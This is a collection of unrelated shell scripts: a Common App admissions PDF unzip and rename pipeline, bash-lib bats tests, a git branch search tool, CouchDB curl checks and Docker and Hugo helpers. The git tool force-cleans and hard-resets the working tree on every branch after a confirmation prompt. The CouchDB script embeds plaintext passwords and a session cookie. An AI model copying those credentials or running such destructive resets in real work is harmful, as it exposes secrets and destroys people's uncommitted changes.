# Error-report recipient list for the given campus; reads the *Errors
# globals configured at the top of the script.
function campusErrorEmail {
  if [[ "$1" == "UMBOS" ]]; then
    echo ${bostonErrors}
  elif [[ "$1" == "UMDAR" ]]; then
    echo ${dartmouthErrors}
  elif [[ "$1" == "UMLOW" ]]; then
    echo ${lowellErrors}
  fi
}
# find all the zip files in the directory and itterate through each one
# commonAppUnzip <CAMPUS>: unzip every <CAMPUS>_*.zip in the current
# directory into 1_unzipFiles/<CAMPUS>, archive good zips (quarantine bad
# ones), log each received file, and email the campus a receipt/warning
# about how many zips arrived (thresholds depend on cycleMessage).
function commonAppUnzip {
  echo "$(date) - Unzipping files for ${1}..." >> ${runLog}
  local currentCampus="${1}"
  local logHeader="Date/Time,File Name"
  local unzipDate="$(date +%Y-%m-%d)"
  local zipsToProcess=`ls -1 ${inputDirectory}${currentCampus}_*.zip 2>/dev/null | wc -l`
  local campusAlert=$(campusEmail $currentCampus)
  local emailFile="${inputDirectory}ca_logs/${unzipDate}|$(translateCampusName $currentCampus)|Common_App|1_unzip${runType}.csv"
  local unzipPath="1_unzipFiles/${currentCampus}"
  local fileCount
  # odd syntax is to protect against whitespace and other characters in the filenames
  find . -maxdepth 1 -type f -name "${currentCampus}_*.zip" -print0 | while IFS= read -rd $'\0' f ; do >> $runLog 2>&1
    # log out current file
    local fileDate="$(date +%Y-%m-%d\ %I:%M:%S\ %p -r "$f")"
    DIImportLogging.log "1_unzip" "$(translateCampusName $currentCampus)" "${logHeader}" "${fileDate},${f}"
    # perform the unzip
    # Test the archive first; corrupt zips are quarantined and reported.
    if ! unzip -t -q -d "${unzipPath}" "${f}"; then
      echo "could not unzip file [${f}]. It has been moved to the error directory" |
      mailx -s "[DI ${hostAbrev} Error] Common App Import Error" ${alertEmail}
      mv "${f}" "error"
      # NOTE(review): this assignment happens inside a pipeline subshell,
      # so the parent script's errorCode never changes — confirm intended.
      errorCode="1"
    else
      unzip -q -d "${unzipPath}" "${f}" >> $runLog 2>&1
      mv "${f}" "archive" >> $runLog 2>&1
    fi
  done
  echo "$(date) - Finished unzipping files for ${1}" >> ${runLog}
  # Count the PDFs extracted so the receipt email can report them.
  fileCount=`ls ${unzipPath} | grep pdf$ | wc -l`
  #Sends an email, may alert if there is a problem with the number of zips rec'd depending on the cycleMessage flag
  if [ $cycleMessage -eq 1 ]; then
    # Low point in the cycle: any number of zips (even zero) is routine.
    if [ $zipsToProcess -eq 0 ]; then
      (echo -e "No files were received for $(longCampusName $currentCampus) on ${unzipDate}") | mailx -s "[DI $hostAbrev Notice] ${1} No Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
    else
      (echo -e "Attached is a list of zip files received from Common App for $(longCampusName $currentCampus) on ${unzipDate} \nThe zips contained ${fileCount} pdfs."; uuencode "${emailFile}" "${unzipDate}_$(longCampusName $currentCampus)_Common_App_zips.csv") | mailx -s "[DI $hostAbrev Notice] ${zipsToProcess} ${1} Common App File(s) Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
    fi
  else
    # Normal season: Boston/Lowell expect 2 zips, Dartmouth expects 3;
    # anything less triggers a warning instead of a plain receipt.
    if [ $zipsToProcess -eq 0 ]; then
      (echo -e "No files were received for $(longCampusName $currentCampus) on ${unzipDate}.\nYou may want to verify this on the Common App Control Center") | mailx -s "[DI $hostAbrev Warning] ${1} No Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
    elif [ $currentCampus != "UMDAR" -a $zipsToProcess -eq 1 ]; then
      (echo -e "Two zips were expected for $(longCampusName $currentCampus) on ${unzipDate}.\nWe have only received ${zipsToProcess}.\nYou may want to verify this is correct on the Common App Control Center. \nThe zip(s) contained ${fileCount} pdfs."; uuencode "${emailFile}" "${unzipDate}_$(longCampusName $currentCampus)_Common_App_zips.csv") | mailx -s "[DI $hostAbrev Warning] ${1} Unexpected Number of Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
    elif [ $currentCampus == "UMDAR" -a $zipsToProcess -lt 3 ]; then
      (echo -e "Three zips were expected for $(longCampusName $currentCampus) on ${unzipDate}.\nWe have only received ${zipsToProcess}.\nYou may want to verify this is correct on the Common App Control Center. \nThe zip(s) contained ${fileCount} pdfs."; uuencode "${emailFile}" "${unzipDate}_$(longCampusName $currentCampus)_Common_App_zips.csv") | mailx -s "[DI $hostAbrev Warning] ${1} Unexpected Number of Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
    else
      (echo -e "Attached is a list of zip files received from Common App for $(longCampusName $currentCampus) on ${unzipDate} \nThe zips contained ${fileCount} pdfs."; uuencode "${emailFile}" "${unzipDate}_$(longCampusName $currentCampus)_Common_App_zips.csv") | mailx -s "[DI $hostAbrev Notice] ${1} Common App Files Received for ${unzipDate}" ${campusAlert} >> $runLog 2>&1
    fi
  fi
}
# Move Common App PDFs that failed to render out of the unzip area,
# log them for reprint, and e-mail the campus a CSV of the failures.
# Arguments: $1 - campus code (e.g. UMBOS). Relies on globals set by the
# main script: inputDirectory, runLog, runType, hostAbrev, errorBody,
# DIImportLogging_workingPath.
function checkForErrorPDFs {
echo "$(date) - Checking for errors for ${1}" >> ${runLog}
local currentCampus="${1}"
local logDate="$(date +%Y-%m-%d)"
local dirToCheck="${inputDirectory}1_unzipFiles/${currentCampus}"
local todaysLog="ca_logs/${1}_errorPDF_${logDate}${runType}.csv"
# Count of PDFs currently sitting in the campus unzip folder.
local filesToCheck=`ls -1 ${dirToCheck}/*.pdf 2>/dev/null | wc -l`
local numberOfErrors=0
local logHeader="CAMPUS,CAID,CODE,STUDENT NAME,CEEB,RECOMMENDER ID"
local targetEmail=$(campusErrorEmail $currentCampus)
local emailFile="${DIImportLogging_workingPath}${logDate}|$(translateCampusName $currentCampus)|Common_App|3_errors${runType}.csv"
if [ ${filesToCheck} != 0 ]; then
# Collect the names of bad PDFs two ways:
# 1) files whose content carries the vendor's error marker ("retreiving"
#    is [sic] - it matches the vendor's own misspelling);
grep -r -i "Error retreiving document for" $dirToCheck | awk ' {for (i=3; i<NF; i++) printf $i " "; $NF=""; print $NF}' | sed 's/[ \t]*$//' >> `echo $todaysLog`
# 2) files exactly 753 bytes long - presumably the size of the vendor's
#    error-placeholder PDF (NOTE(review): confirm this magic size).
find $dirToCheck -size 753c >> `echo $todaysLog`
# Quarantine every listed file into the error folder and count them.
while IFS= read line; do
mv "${line}" "${inputDirectory}error/${1}" >> $runLog 2>&1
numberOfErrors=$((numberOfErrors+1))
done < "${inputDirectory}$todaysLog"
if [ ${numberOfErrors} != 0 ]; then
# Disable history expansion so special characters in the regex stay literal.
set +H
emailFormatRegex="^.*\(([0-9]+)\)*([a-zA-Z]{2,3})_*([0-9]*)_([0-9]+)_+([\'[:space:]A-Za-z-]+_[\'[:space:]A-Za-z-]+)_.*([a-zA-Z]{2,3}+)_*([0-9]*).pdf$"
# Re-read the list, reshaping each file name into the CSV columns
# declared in logHeader, upper-cased for consistency.
while IFS= read f; do
local userFriendly="$(echo ${f} | sed -re "s#${emailFormatRegex}#${1},\4,\2,\5,\3,\7 #g")"
local caseFixer="$(echo $userFriendly | tr '[:lower:]' '[:upper:]')"
DIImportLogging.log "3_errors" "$(translateCampusName $currentCampus)" "${logHeader}" "${caseFixer}"
done < "${inputDirectory}$todaysLog"
rm "${inputDirectory}$todaysLog" >> $runLog 2>&1
# Mail the reprint list to the campus (uuencoded CSV attachment).
(echo -e "${errorBody}"; uuencode "${emailFile}" "${logDate}_$(longCampusName $currentCampus)_Common_App_errors.csv") | mailx -s "[DI $hostAbrev Notice] ${1} Common App Reprints for ${logDate}" ${targetEmail} >> $runLog 2>&1
fi
fi
echo "$(date) - Error check complete for ${1}" >> ${runLog}
}
# Rename unzipped Common App PDFs into the import-agent naming convention
# (CA_<yymmdd>_<drawer>_<caid>_<code>_<type>..., upper-cased) and move
# them into the output directory, logging each rename.
# Arguments: $1 - campus code. Uses globals: runLog, outputDirectory.
function commonAppProcessFiles {
echo "$(date) - Processing pdfs for ${1}" >> ${runLog}
local currentCampus="${1}"
local currDate="$(date +%y%m%d)"
local drawerName=$(shortCampusName $1)
local dateTime="$(date +%Y-%m-%d\ %I:%M:%S\ %p)"
# setup logging
local logHeader="Date/Time,Original File Name,Renamed File Name"
# turn off history substitution to allow for correct regex parsing
set +H
# incomingFilesRegex is not used below - presumably kept as reference
# documentation of the simpler incoming-file name shape.
incomingFilesRegex="^.*\)([a-zA-Z]{2,3})_([0-9]+)_.*_([A-Z]+).pdf$"
uberRegex="^.*\(([0-9]+)\)*([a-zA-Z]{2,3})_*([0-9]*)_([0-9]+)_.*_([A-Z]+)_*([0-9]*).pdf$"
# NUL-delimited find/read so file names containing spaces survive.
find "1_unzipFiles/${1}" -regextype posix-extended -regex "${uberRegex}" -print0 | while IFS= read -rd $'\0' f ; do >> $runLog 2>&1
# do some stuff to the files here
# Reassemble the captured name parts into the target naming convention.
local newName="$(echo ${f} | sed -re "s#${uberRegex}#CA_${currDate}_${drawerName}_\4_\2_\5_\3_\1.pdf#g")"
local standardizedName="$(echo $newName | tr '[:lower:]' '[:upper:]')"
DIImportLogging.log "2_rename" "$(translateCampusName $currentCampus)" "${logHeader}" "${dateTime},${f},${newName}"
mv "${f}" "${outputDirectory}${standardizedName}"
done
echo "$(date) - Finished processing pdfs for ${1}" >> ${runLog}
}
### --- main script --- ###
# attempt to get a lock on the process
# mkdir is atomic, so it doubles as a mutual-exclusion lock file.
if (mkdir $runLock) >> ${runLog} 2>&1; then
# get environment abreviation (DEV|TST\PRD)
# Host names embed the environment in characters 3-5 (0-indexed 2:3).
hostAbrev="$(hostname)"
hostAbrev="${hostAbrev:2:3}"
hostAbrev="$(echo ${hostAbrev} | tr '[:lower:]' '[:upper:]')"
# build working path
inputDirectory="/di_interfaces/DI_${hostAbrev}_COMMONAPP_AD_INBOUND/"
cd "${inputDirectory}" >> $runLog 2>&1
outputDirectory="/di_interfaces/import_agent/DI_${hostAbrev}_SA_AD_INBOUND/"
# build log paths
DIImportLogging_workingPath="ca_logs/"
# unzip the files
commonAppUnzip "UMBOS"
commonAppUnzip "UMDAR"
commonAppUnzip "UMLOW"
# check for the Contact Support messagge
checkForErrorPDFs "UMBOS"
checkForErrorPDFs "UMDAR"
checkForErrorPDFs "UMLOW"
# process the files
commonAppProcessFiles "UMBOS"
commonAppProcessFiles "UMDAR"
commonAppProcessFiles "UMLOW"
# release the lock taken above
rm -rf "$runLock" >> ${runLog} 2>&1
else
echo "`date` - Script already running" >> ${runLog}
fi
echo ${runLogDelim} >> ${runLog}
exit ${errorCode} >> $runLog 2>&1
| true
|
9576556a2f3d4f30ea2285cbb3ef9744113eb167
|
Shell
|
masukomi/masuconfigs
|
/bin/branch_finder
|
UTF-8
| 1,375
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# branch_finder "grep string" search_type
#
# Iterates every local branch, force-cleaning the working tree on each,
# and reports which branches match <grep_string> either in the files
# touched by the last commit ("last_commit") or anywhere in the working
# tree ("codebase").
# WARNING: destroys all uncommitted changes (git clean -f / reset --hard).
# NOTE: shebang changed to bash - the script uses [[ ]], which is not
# guaranteed under /bin/sh.
# search types
if [[ "$#" -lt 2 ]]; then
echo "Usage: branch_finder <grep_string> <search_type>"
echo "search types: last_commit, codebase"
exit 0
fi
echo "WARNING: This will blow away all uncommitted changes. ok? [y/n]"
read OK
if [[ "$OK" == "y" ]]; then
LOOKING_FOR=$1
SEARCH_TYPE=$2
echo "LOOKING FOR: $LOOKING_FOR"
if [[ "$SEARCH_TYPE" == "last_commit" ]]; then
echo "in files touched in the last commit"
elif [[ "$SEARCH_TYPE" == "codebase" ]]; then
echo "in the entire codebase"
else
echo "unsupported search type: $SEARCH_TYPE"
exit 1
fi
# List local branch names (refs/heads/*), stripped of quotes and prefix.
BRANCHES=$(git for-each-ref --shell --format="%(refname)" \
| grep 'refs/heads' --color=never \
| sed "s/'//g" | sed "s/refs\/heads\///" )
for branch in $BRANCHES; do
echo "checking in $branch"
git clean --quiet -f
git reset --quiet --hard HEAD
git checkout --quiet "$branch"
#echo $(git log --stat -n 1 | grep user.rb)
if [[ "$SEARCH_TYPE" == "last_commit" ]]; then
# BUGFIX: quote the pattern (and guard with --) so patterns with
# spaces or a leading dash aren't split or treated as grep options.
git log --stat -n 1 | grep -- "$LOOKING_FOR"
elif [[ "$SEARCH_TYPE" == "codebase" ]]; then
grep -r -- "$LOOKING_FOR" *
fi
if [[ $? -eq 0 ]] ; then
echo '========================================'
echo "$branch matched"
git log --stat -n1
echo '========================================'
fi
done
else
echo "Ok. No worries. Come again when you're ready"
fi
| true
|
fddd854418dde3a40c9be981b3363f5ad1d31018
|
Shell
|
bluelamar/WsRuler
|
/scripts/check_cdb.sh
|
UTF-8
| 3,502
| 2.65625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Smoke-test a local CouchDB instance on :5984: probe well-known
# endpoints, establish a cookie session, and exercise database/document
# operations. Everything after the mid-script "exit 0" is unreachable
# scratch kept for reference.
echo "Get the root /:"
curl http://localhost:5984/
echo "Get the utils index.html:"
curl http://localhost:5984/_utils/index.html
echo "Get the utils verify install:"
curl http://localhost:5984/_utils/index.html#verifyinstall
AUTHHDR="Authorization:"
#AUTHUSER="wsruler"
AUTHPWD="oneringtorule"
AUTHUSER="admin"
AUTHPWD="mysecretpassword"
#AUTHVAL="Basic " +btoa(username + ":" + password"
# NOTE(review): echo appends a newline that gets base64-encoded too; use
# printf/echo -n if these AUTH* variables are ever actually sent (the
# curl calls below authenticate via form POST / cookie instead).
AUTHVAL=`echo "${AUTHUSER}:${AUTHPWD}" | base64`
AUTHSTR="Basic ${AUTHVAL}"
# WORKS
#curl -v -H "Accept: application/json" -H "Content-Type: application/x-www-form-urlencoded" http://localhost:5984/_session -X POST -d "name=wsruler&password=oneringtorule"
echo "Get a session with json:"
curl -v -H "Accept: application/json" -H "Content-Type: application/json" http://localhost:5984/_session -X POST -d '{"name":"wsruler","password":"oneringtorule"}'
#POST /_session HTTP/1.1
#Accept: application/json
#Content-Length: 24
#Content-Type: application/x-www-form-urlencoded
#Host: localhost:5984
#
#name=root&password=relax
#COOKIE="AuthSession=d3NydWxlcjo1QkNFQTZCMjo3Hyf5CvRgjcMLazq6rQMrkksYnw; Version=1; Path=/; HttpOnly"
# Save the session cookie to the cdbcookies jar for the calls below.
curl -c cdbcookies -H "Accept: application/json" -H "Content-Type: application/x-www-form-urlencoded" http://localhost:5984/_session -X POST -d "name=wsruler&password=oneringtorule"
echo "Get all the dbs:"
# ex: []
# curl --cookie "$COOKIE" http://localhost:5984/_all_dbs
curl --cookie "cdbcookies" http://localhost:5984/_all_dbs
echo "Get the list of nodes:"
# Returns a list of nodes
# ex: {"all_nodes":["nonode@nohost"],"cluster_nodes":["nonode@nohost"]}
#curl --cookie "$COOKIE" http://localhost:5984/_membership
curl --cookie "cdbcookies" http://localhost:5984/_membership
#echo "Put a new node:"
#curl --cookie "cdbcookies" -X PUT "http://localhost:5984/_nodes/node2@111.222.333.444" -d {}
#echo "Get the list of nodes again:"
#curl --cookie "cdbcookies" http://localhost:5984/_membership
echo "Get the config for node nonode:"
#curl http://localhost:5984/_node/{node-name}/_config
curl --cookie "cdbcookies" "http://localhost:5984/_node/nonode@nohost/_config"
curl http://localhost:5984/_uuids
# Health check endpoint
curl http://localhost:5984/_up
echo "Creates a new database:"
curl -v --cookie "cdbcookies" http://localhost:5984/bluff -X PUT
echo "Returns the database information:"
curl http://localhost:5984/fluff
#echo "Checks the database existence:"
#curl http://localhost:5984/stuff -X HEAD
echo "Creates a new document with generated ID if _id is not specified:"
curl -H "Content-Type: application/json" http://localhost:5984/stuff -X POST -d '{"name":"bud","age":99}'
echo "Returns a built-in view of all documents in this database:"
curl http://localhost:5984/tuff/_all_docs
# Everything below is intentionally unreachable scratch/reference.
exit 0
echo "Get the db id=592ccd646f8202691a77f1b1c5004496 :"
curl http://localhost:5984/stuff/592ccd646f8202691a77f1b1c5004496
echo "Update a document with _id=592ccd646f8202691a77f1b1c5004496:"
curl --cookie "cdbcookies" -H "Content-Type: application/json" http://localhost:5984/stuff/592ccd646f8202691a77f1b1c5004496 -X PUT -d '{"name":"sam","age":42,"_rev":"1-3f12b5828db45fda239607bf7785619a"}'
echo "Get again the db id=592ccd646f8202691a77f1b1c5004496 :"
curl http://localhost:5984/stuff/592ccd646f8202691a77f1b1c5004496
# Creates a new database
curl http://localhost:5984/{db} -X PUT
# Deletes an existing database
curl http://localhost:5984/{db} -X DELETE
curl http://localhost:5984/{db}/_all_docs
curl http://localhost:5984/{db}/_all_docs -X POST
| true
|
869cd6928f4bf91ffa93f0992766690ee3c26d40
|
Shell
|
nawa/back-friend
|
/functional-tests/run_tests.sh
|
UTF-8
| 987
| 3.25
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# Spin up the functional-test stack with docker-compose (postgres, then
# the rest service), run the test container, tear everything down, and
# exit with the tests' status.
TESTS_RESULT=0
echo "======================= Prepare environment ======================="
docker-compose --file functional-tests/docker-compose.yml down
docker-compose --file functional-tests/docker-compose.yml up -d postgres
#wait for postgres start. Can be improved
sleep 5;
docker-compose --file functional-tests/docker-compose.yml up -d rest
echo -e "\n======================= Run tests ======================="
docker-compose --file functional-tests/docker-compose.yml up --abort-on-container-exit functional-tests
# Capture the test container's exit status before tearing down.
TESTS_RESULT=$?
echo -e "\n======================= Destroy environment ======================="
docker-compose --file functional-tests/docker-compose.yml down
# tput setaf colours the banner (4 = blue, 1 = red); sgr0 resets.
if [ "$TESTS_RESULT" -eq "0" ];
then
tput setaf 4; echo -e "\n!!!!!!!!!!!!!!!!!!!!!!! Tests successfully completed !!!!!!!!!!!!!!!!!!!!!!!"; tput sgr0;
else
tput setaf 1; echo -e "\n!!!!!!!!!!!!!!!!!!!!!!! Tests failed !!!!!!!!!!!!!!!!!!!!!!!"; tput sgr0;
fi
exit ${TESTS_RESULT}
| true
|
6843cc1d7bb2ebd9bbb11a30cc56938869e8309b
|
Shell
|
KoShimizuV/learnings
|
/bash/for2.sh
|
UTF-8
| 127
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/sh
# Demo: write two sample lines to tmp.txt, then print each line back
# prefixed with "line=", reading the file one line at a time.
printf '%s\n' "1 b c" > tmp.txt
printf '%s\n' "2 b c" >> tmp.txt
while IFS= read -r line
do
echo "line=${line}"
done < tmp.txt
| true
|
4490901e03daa3de0a4d52a9a28c582bf46e0643
|
Shell
|
yunju/DMAnaRun2_AddModules
|
/prod/printEOSFile.sh
|
UTF-8
| 577
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# Write the EOS paths of all ROOT files under /store/user/<userid>/<dir>
# to the given output file, descending two directory levels with cmsLs.
# Usage: ./printEOSFile.sh <directory> <outputFileName> [userid]
scriptname=`basename $0`
EXPECTED_ARGS=3
userid="syu"
# With 2 args keep the default userid; with any other count (not 3)
# print usage and bail; with 3 take the userid from $3.
if [ $# -eq $(( EXPECTED_ARGS - 1 )) ]
then
echo "user ID is set to "$userid
else if [ $# -ne $EXPECTED_ARGS ]
then
echo "Usage: ./$scriptname directory outputFileName userid"
echo "Example: ./$scriptname AbelianZPrime_ZH_lljj_M800-MADGRAPH filelist syu"
exit 1
else
userid=$3
fi
fi
echo $1
echo "user ID is "$userid
# cmsLs prints the path in column 5; each "awk | bash" round descends
# one directory level, then the final grep keeps only root files.
cmsLs /store/user/$userid/$1 | grep -a $userid | awk '{print "cmsLs "$5}' | bash | grep -a $userid | awk '{print "cmsLs "$5}' | bash | grep -a root | awk '{print $5}' > $2
| true
|
36f4ed1e1ad3b6569810e50013fdc0ab039c4048
|
Shell
|
biodranik/landing-hugo
|
/tools/watch.sh
|
UTF-8
| 554
| 3.5
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Serve the Hugo site locally in watch mode (auto-rebuild on changes).
# Useful debug options:
# -e aborts if any command has failed.
# -u aborts on using unset variable.
# -x prints all executed commands.
# -o pipefail aborts if on any failed pipe operation.
set -euo pipefail
# Project root directory without slash at the end.
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
ROOT="$SCRIPT_DIR/.."
# Hugo (extended) automatically rebuilds the site on any scss changes.
hugo server -s "$ROOT" || { echo "Please install hugo binary from here: https://github.com/gohugoio/hugo/releases"; exit 1; }
| true
|
7f1dd174c0c8748527578c8fc6062811836241ed
|
Shell
|
geircode/setting-up-ghost-in-azure
|
/phpmyadmin/docker-compose.up.sh
|
UTF-8
| 481
| 2.84375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Recreate the phpmyadmin container on the shared attachable overlay
# network, then open an interactive shell inside it.
BASEDIR=$(dirname "$0")
echo "$BASEDIR"
cd $BASEDIR
# Remove any stale container before bringing the stack back up.
docker rm -f phpmyadmin-1
docker-compose -f docker-compose.yml down --remove-orphans
docker network create -d overlay --attachable setting_up_ghost_in_azure_network
docker-compose -f docker-compose.yml up -d --remove-orphans
# wait for 1-2 seconds for the container to start
echo sleeping 2 secs
sleep 2
# http://localhost:8900/
echo "Opening a terminal to the Container..."
docker exec -it phpmyadmin-1 /bin/bash
| true
|
8ae6e4b1a962fed823149dc02f9a082744a81c09
|
Shell
|
mdehollander/longread-UMI-pipeline
|
/scripts/check_primer_position.sh
|
UTF-8
| 1,994
| 3.796875
| 4
|
[] |
no_license
|
#!/bin/bash
# DESCRIPTION
# Script for checking position of gene specific primers
# in read terminals when used with custom library preparation.
# Custom library preparation includes change or modification to
# any adaptors and/or use of Nanopore barcoding kits.
#
# IMPLEMENTATION
# author Søren Karst (sorenkarst@gmail.com)
# Ryans Ziels (ziels@mail.ubc.ca)
# license GNU General Public License
#
### Source commands and subscripts -------------------------------------
# dependencies.sh is expected to define $GAWK, $CUTADAPT and $SEQTK.
export PIPELINE_PATH="$(dirname "$(readlink -f "$0")")"
. $PIPELINE_PATH/dependencies.sh # Path to dependencies script
### Terminal input ------------------------------------------------------------
READ_IN=${1:-reads.fq}
OUT_DIR=${2:-primer_position}
THREADS=${3:-60}
FW2=${4:-AGRGTTYGATYMTGGCTCAG} #RC: CTGAGCCAKRATCRAACYCT
RV2=${5:-CGACATCGAGGTGCCAAAC} #RC: GTTTGGCACCTCGATGTCG
TERMINAL_LENGTH=${6:-500}
### Determine primer mapping positions
# Create output dir
mkdir $OUT_DIR
# Extract adaptor region
# For every FASTQ record (4 lines: header on NR%4==1, sequence on
# NR%4==2) write the first TERMINAL_LENGTH bases to reads_t1.fa and the
# last TERMINAL_LENGTH bases to reads_t2.fa, as FASTA.
$GAWK -v BD="$OUT_DIR" -v TL="$TERMINAL_LENGTH" '
NR%4==1{
print ">" substr($1,2) > BD"/reads_t1.fa";
print ">" substr($1,2) > BD"/reads_t2.fa";
}
NR%4==2{
print substr($0, 1, TL) > BD"/reads_t1.fa";
print substr($0, length($0) - TL + 1, TL) > BD"/reads_t2.fa";
}
' $READ_IN
# Determine primer start position from either end
# cutadapt -a trims at the primer match; the length of what remains is
# the primer start offset. The awk block histograms those offsets
# (count per position up to the max seen) and appends mean/sd.
primer_start_pos(){
$CUTADAPT \
-j $THREADS \
-O 10 \
-a $FW2 \
-a $RV2 \
- \
--discard-untrimmed \
--quiet |\
awk '
NR%2==0{
# Position
p=length($0)+0
c[p]++
if(pm+0 < p){pm = p}
# SD and MEAN
sum+=p
sums+=p*p
n++
} END {
for(j=0; j <= pm; j++){
print j, c[j]+0
}
print "\nMean\tsd"
print sum/n"\t"sqrt(sums/n -(sum/n)^2)
}
'
}
cat $OUT_DIR/reads_t1.fa |\
primer_start_pos \
> $OUT_DIR/reads_t1_pos.txt
# Reverse-complement the tail-end extracts so primers are scanned in the
# same orientation as the head-end check.
$SEQTK seq -r $OUT_DIR/reads_t2.fa |\
primer_start_pos \
> $OUT_DIR/reads_t2_pos.txt
| true
|
f8882836ac18d0c5c1aad0b649a2d272fc0d73ec
|
Shell
|
Zeebrow/wish
|
/plugins/fmt_md_text/build.sh
|
UTF-8
| 584
| 3.3125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Build the fmt_md_text helper binary inside Docker and copy it into
# src/scripts/helpers. Must be run from ./plugins/fmt_md_text.
# Arguments: $1 - output binary name (default: fmt_md_text).
bin_output_name=${1:-fmt_md_text}
randomname=$(uuidgen)
container=wish/"$bin_output_name"
# BUGFIX: use $(...) and quote the expansion - the previous unquoted
# ${d##*/} broke the test when the path contained whitespace.
d=$(pwd)
[ "${d##*/}" != "fmt_md_text" ] && echo "must run build from ./plugins/fmt_md_text" && exit 1
printf "building...\n"
docker build --build-arg BIN_OUTPUT_NAME="$bin_output_name" -t "$container" . || exit 1
printf "standup...\n"
# Create (but don't start) a throwaway container just to copy the
# compiled binary out of the image.
docker container create --name "$randomname" "$container" || exit 1
printf "copying binary...\n"
docker container cp "$randomname":/output/fmt_md_text ../../src/scripts/helpers || exit 1
printf "rm...\n"
docker container rm "$randomname" || exit 1
| true
|
7e0704013db0eb0491f2d4044b14f4826008599b
|
Shell
|
cyberark/bash-lib
|
/tests-for-this-repo/helpers.bats
|
UTF-8
| 5,630
| 3.390625
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
# Bats test-suite for the bash-lib helpers: bl_die, bl_fail,
# bl_spushd/bl_spopd, bl_is_num, bl_retry and bl_retry_constant.
# Requires BASH_LIB_DIR to point at the library checkout.
. "${BASH_LIB_DIR}/test-utils/bats-support/load.bash"
. "${BASH_LIB_DIR}/test-utils/bats-assert-1/load.bash"
. "${BASH_LIB_DIR}/init"
# run before every test
setup(){
temp_dir="${BATS_TMPDIR}/testtemp"
mkdir "${temp_dir}"
# afile is appended to by the retry fixtures; its line count records
# how many times a retried command actually ran.
afile="${temp_dir}/appendfile"
}
teardown(){
temp_dir="${BATS_TMPDIR}/testtemp"
rm -rf "${temp_dir}"
}
@test "bl_die exits and prints message" {
run bash -c ". ${BASH_LIB_DIR}/init; bl_die msg"
assert_output --partial msg
assert_failure
}
@test "bl_fail fails but does not exit" {
run bl_fail message
assert_failure
assert_output --partial message
}
@test "bl_spushd is quiet on stdout" {
run bl_spushd /tmp
assert_output ""
assert_success
}
@test "bl_spopd is quiet on stdout" {
pushd .
run bl_spopd
assert_output ""
assert_success
}
@test "bl_spushd dies on failure" {
run bash -c ". ${BASH_LIB_DIR}/init; bl_spushd /this-doesnt-exist"
assert_output --partial "No such file or directory"
assert_failure
}
@test "bl_spopd dies on failure" {
run bash -c ". ${BASH_LIB_DIR}/init; bl_spopd"
assert_output --partial "stack empty"
assert_failure
}
@test "bl_is_num fails with no arguments" {
run bl_is_num
assert_output ""
assert_failure
}
@test "bl_is_num fails with alphabetical input" {
run bl_is_num foo
assert_output ""
assert_failure
}
@test "bl_is_num suceeds with integer" {
run bl_is_num 123
assert_output ""
assert_success
}
@test "bl_is_num suceeds with negative integer" {
run bl_is_num -123
assert_output ""
assert_success
}
@test "bl_is_num suceeds with float" {
run bl_is_num 123.4
assert_output ""
assert_success
}
@test "bl_is_num suceeds with negative float" {
run bl_is_num -123.4
assert_output ""
assert_success
}
# The timing assertions below allow 1-2s slack for scheduling jitter.
@test "bl_retry runs command only once if it succeeds the first time" {
retryme(){
date >> ${afile}
}
run bl_retry 3 retryme
assert_success
assert_equal $(wc -l <${afile}) 1
}
@test "bl_retry doesn't introduce delay when the command succeeds first time" {
retryme(){
date >> ${afile}
}
start=$(date +%s)
run bl_retry 3 retryme
end=$(date +%s)
assert [ "$(( start + 1 ))" -ge "${end}" ]
assert_success
}
@test "bl_retry runs n times on consecutive failure and waits between attempts" {
retryme(){
date >> ${afile}
false
}
start=$(date +%s)
run bl_retry 2 retryme
end=$(date +%s)
# introduces at least a two second delay between attempts
assert [ "$(( start + 2 ))" -le "${end}" ]
assert_failure
assert_equal $(wc -l <${afile}) 2
}
@test "bl_retry returns after first success" {
retryme(){
date >> "${afile}"
case $(wc -l < ${afile}) in
*1)
return 1
;;
*)
return 0
;;
esac
}
run bl_retry 3 retryme
assert_success
assert_equal $(wc -l <${afile}) 2
}
@test "bl_retry fails with less than two arguments" {
run bl_retry 3
assert_failure
assert_output --partial usage
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry fails with non-integer retry count" {
run bl_retry "this" date
assert_failure
assert_output --partial number
assert [ ! -e "${temp_dir}/appendfile" ]
}
@test "bl_retry succeeds with compound statements" {
run bl_retry 3 "true && date >> ${afile}"
assert_success
assert_equal $(wc -l <${afile}) 1
}
# ***************
@test "bl_retry_constant runs command only once if it succeeds the first time" {
retry_me(){
date >> ${afile}
}
run bl_retry_constant 3 1 retry_me
assert_success
assert_equal $(wc -l <${afile}) 1
}
@test "bl_retry_constant doesn't introduce delay when the command succeeds first time" {
retry_me(){
date >> ${afile}
}
start=$(date +%s)
run bl_retry_constant 3 10 retry_me
end=$(date +%s)
assert [ "$(( start + 1 ))" -ge "${end}" ]
assert_success
}
@test "bl_retry_constant runs n times on consecutive failure and waits between attempts" {
retry_me(){
date >> ${afile}
false
}
start=$(date +%s)
run bl_retry_constant 2 2 retry_me
end=$(date +%s)
# introduces at least a two second delay between attempts
assert [ "$(( start + 2 ))" -le "${end}" ]
assert_failure
assert_equal $(wc -l <${afile}) 2
}
@test "bl_retry_constant returns after first success" {
retry_me(){
date >> "${afile}"
case $(wc -l < ${afile}) in
*1)
return 1
;;
*)
return 0
;;
esac
}
run bl_retry_constant 3 1 retry_me
assert_success
assert_equal $(wc -l <${afile}) 2
}
@test "bl_retry_constant fails with less than three arguments" {
run bl_retry_constant 3 1
assert_failure
assert_output --partial usage
